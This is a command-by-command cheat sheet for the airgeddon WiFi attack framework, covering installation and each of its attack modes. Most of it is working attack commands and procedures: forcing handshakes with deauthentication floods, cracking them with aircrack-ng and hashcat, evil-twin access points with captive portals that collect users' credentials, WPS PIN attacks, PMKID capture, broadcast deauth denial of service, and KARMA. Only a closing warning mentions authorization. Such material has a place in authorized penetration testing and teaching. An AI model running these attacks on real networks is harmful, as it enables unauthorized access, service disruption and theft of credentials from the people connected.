
airgeddon

# Debian/Ubuntu
sudo apt-get update
sudo apt-get install git curl
sudo apt-get install aircrack-ng netcat-openbsd dnsmasq hostapd

# Arch Linux
sudo pacman -S aircrack-ng openbsd-netcat dnsmasq hostapd

# Dependencies for optional features
sudo apt-get install pixiewps bully reaver hcxdumptool hashcat
git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git
cd airgeddon
chmod +x airgeddon.sh
sudo ./airgeddon.sh
docker pull v1s1t0r1sh3r3/airgeddon:latest
docker run -it --privileged -v /sys/kernel/debug:/sys/kernel/debug \
  v1s1t0r1sh3r3/airgeddon:latest
# Run as root (required for monitor mode and packet injection)
sudo ./airgeddon.sh

# Run with language override
sudo ./airgeddon.sh -i es
./airgeddon.sh --help          # Show help menu
./airgeddon.sh -l              # List available languages
./airgeddon.sh -i [LANG]       # Set interface language
./airgeddon.sh --check         # Verify dependencies only
Main Menu → Change WiFi interface
Select your wireless adapter (wlan0, wlan1, etc.)
Main Menu → Monitor Mode
  ↳ Enable monitor mode on selected interface
  ↳ System will create mon0 (or similar)
  ↳ Required for all scanning operations
Main Menu → Monitor Mode → Disable
# Or manually:
sudo airmon-ng stop wlan0
# Check active interfaces
iwconfig

# Should show "Mode:Monitor"
# Interface mon0 or similar active
Main Menu → Scanning
  ↳ Explore networks around you
  ↳ View SSID, BSSID, Channel, Power, etc.
Available columns:
  SSID          - Network name
  BSSID         - MAC address (AA:BB:CC:DD:EE:FF)
  Channel       - WiFi channel (1-14 or 5 GHz)
  Security      - WPA2, WPA, WEP, Open
  Power         - Signal strength (dBm)
  Clients       - Connected devices
During scan, you can:
  1. Select networks by BSSID
  2. Filter by channel
  3. Save results to file
Main Menu → Attacks → Capture handshake
  1. Select target network from scan
  2. Choose capture interface (mon0)
  3. Let it run until "Handshake captured" message
  4. Ctrl+C to stop
Main Menu → Attacks → Capture handshake → Deauthentication
  ↳ Optional: Automatically send deauth frames
  ↳ Forces clients to reconnect and capture handshake
  ↳ Choose deauth timing (delay)
# Terminal 1: Start airodump-ng (capture packets)
sudo airodump-ng --bssid [BSSID] --channel [CH] \
  --write handshake mon0

# Terminal 2: Send deauth frames (forces reconnect)
sudo aireplay-ng --deauth 0 -a [BSSID] \
  -c [CLIENT_MAC] mon0

# Stop (Ctrl+C) when 4-way handshake captured
Main Menu → Attacks → Crack handshake
  ↳ Wordlist-based cracking
  1. Select handshake (.cap file)
  2. Choose wordlist
     - rockyou.txt (common)
     - Custom wordlist
  3. Start aircrack-ng
  4. Wait for password discovery
# Download rockyou.txt
wget https://github.com/danielmiessler/SecLists/raw/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz
tar -xzf rockyou.txt.tar.gz

# Use in airgeddon
# Point to wordlist path in cracking menu
Main Menu → Attacks → Crack handshake → Brute force
  ↳ Character-based cracking (slower, finds unknown passwords)
  1. Select handshake
  2. Set character set (lowercase, uppercase, numbers, symbols)
  3. Set min/max length
  4. Start attack (can take hours/days)
# Convert .cap to hashcat 22000 format first
# (hcxpcapngtool does the conversion; hcxdumptool only captures)
hcxpcapngtool -o handshake.22000 handshake.cap

# Crack with hashcat (GPU preferred)
hashcat -m 22000 handshake.22000 rockyou.txt
Main Menu → Attacks → Evil Twin
  1. Scan and select target network
  2. Create fake SSID (clone or custom)
  3. Set up DHCP server
  4. Start hostapd (rogue AP)
  5. Optional: Enable DNS spoofing
Main Menu → Attacks → Evil Twin → With Captive Portal
  1. Select target SSID
  2. Configure captive portal page
  3. Set redirect URL
  4. Start malicious AP
  5. Capture credentials from users
Configure before launch:
  Interface       - mon0 or AP interface
  SSID            - Network name (can clone target)
  Channel         - Match target channel
  Encryption      - WPA2 or Open
  DHCP Range      - IP address pool (192.168.1.0/24)
  Gateway IP      - 192.168.1.1
  DNS             - Redirect to custom page
Main Menu → Stop attacks
  ↳ Kill hostapd and dnsmasq
  ↳ Restore network settings
Main Menu → Attacks → WPS attacks → Reaver
  1. Select target network
  2. Enable Reaver
  3. Start PIN guessing (up to 10,000 combinations)
  4. Takes ~4-10 hours
  5. On success: recovers WiFi password directly
Main Menu → Attacks → WPS attacks → Bully
  ↳ Faster WPS cracking alternative
  1. Select target
  2. Choose BULLY mode
  3. More efficient on some routers
  4. Fewer requests than Reaver
Main Menu → Attacks → WPS attacks → Pixie Dust
  ↳ MUCH faster (minutes vs hours)
  1. Select vulnerable router
  2. Start Pixie Dust
  3. Recovers WPS PIN in minutes
  4. PIN = WiFi password
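# Before attack (passive scan; wash ships with reaver, find [BSSID] in its output):
# Note: reaver's -S flag is --dh-small, not a status check
sudo wash -i mon0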

# Shows:
# - WPS version
# - Lock status
# - Vulnerability indicators
Main Menu → Attacks → Deauth/DoS
  1. Select target BSSID
  2. Choose client MAC (or broadcast)
  3. Set frame count (0 = infinite)
  4. Start attack
  5. Disconnects all clients from network
# Terminal method:
sudo aireplay-ng --deauth 100 \
  -a [TARGET_BSSID] \
  -c [CLIENT_MAC] mon0
# Broadcast deauth to all clients:
sudo aireplay-ng --deauth 0 \
  -a [TARGET_BSSID] mon0
# Verify AP accepts injected frames:
sudo aireplay-ng --test -a [BSSID] mon0

# Required for deauth attacks to work
Main Menu → Attacks → PMKID attacks
  1. Select target network
  2. Start PMKID sniffing
  3. Capture PMKID from probe requests
  4. No client reconnection needed
Main Menu → Attacks → PMKID attacks → Crack
  1. Select captured PMKID file
  2. Choose wordlist
  3. Start hashcat (GPU preferred)
  4. Faster than 4-way handshake
# Capture PMKID packets
sudo hcxdumptool -i mon0 -o pmkid.pcapng --disable-status

# Convert to hashcat format
hcxpcapngtool -o pmkid.22000 pmkid.pcapng

# Crack
hashcat -m 22000 pmkid.22000 wordlist.txt
Main Menu → Attacks → Enterprise networks
  ↳ Requires username/password knowledge
  1. Capture RADIUS handshakes
  2. Set up fake RADIUS server
  3. Create evil twin of enterprise AP
  4. Redirect clients to fake auth
Main Menu → Attacks → KARMA
  1. Listen for probe requests
  2. Echo back any SSID clients probe for
  3. Clients auto-connect to fake network
  4. Capture credentials
airgeddon
├── Change WiFi interface
├── Monitor Mode (Enable/Disable)
├── Scanning
├── Attacks
│   ├── Capture handshake
│   ├── Crack handshake
│   ├── Evil Twin
│   ├── WPS attacks
│   ├── Deauth/DoS
│   ├── PMKID attacks
│   └── Enterprise attacks
├── Tools
│   ├── Packet injection test
│   ├── Traffic monitoring
│   └── Check dependencies
├── Language selection
└── Exit
• Use arrow keys / numbers to select
• Press Enter to confirm
• Ctrl+C to cancel/go back
• Follow prompts for each attack
• Monitor windows show real-time progress
aircrack-ng    # Core WiFi cracking suite
netcat         # Network utilities
dnsmasq        # DHCP/DNS server
hostapd        # AP emulation
iw             # WiFi interface control
reaver         # WPS PIN cracking
bully          # WPS alternative
pixiewps       # Pixie Dust attacks
hcxdumptool    # PMKID capture
hashcat        # GPU cracking
mdk3           # Advanced DoS
macchanger     # MAC spoofing
# Run built-in checker
sudo ./airgeddon.sh --check

# Manual verification
which aircrack-ng
which hostapd
which reaver
docker pull v1s1t0r1sh3r3/airgeddon:latest
docker run -it --privileged \
  -v /sys/kernel/debug:/sys/kernel/debug \
  v1s1t0r1sh3r3/airgeddon:latest
docker run -it --privileged --net host \
  -v /sys/kernel/debug:/sys/kernel/debug \
  v1s1t0r1sh3r3/airgeddon:latest
docker run -it --privileged \
  -v ~/wordlists:/root/wordlists \
  v1s1t0r1sh3r3/airgeddon:latest
# Check conflicts
sudo airmon-ng check kill

# Force interface down and restart
sudo ip link set wlan0 down
sudo airmon-ng start wlan0
# Verify monitor mode active
iwconfig | grep Monitor

# Check antenna
sudo iw list | grep -i antenna

# Try different channel range
# Some adapters don't scan 5GHz by default
# Increase deauth attempts
sudo aireplay-ng --deauth 50 -a [BSSID] mon0

# Check channel matches
sudo iwconfig mon0

# Verify adapter supports injection
sudo aireplay-ng --test -a [BSSID] mon0
# Verify target supports WPS (look for [BSSID] in the wash output)
sudo wash -i mon0

# Some routers lock WPS (try Pixie Dust first)
# Check for rate limiting/lockout status
# Check DHCP logs
tail -f /var/log/dnsmasq.log

# Verify hostapd running
ps aux | grep hostapd

# Enable IP forwarding (this command sets the value to 1)
sudo sysctl net.ipv4.ip_forward=1
⚠️  Only use on networks you own or have explicit permission to test
⚠️  Unauthorized network access is illegal in most jurisdictions
⚠️  Use for authorized penetration testing and security research only
⚠️  Always obtain written authorization before testing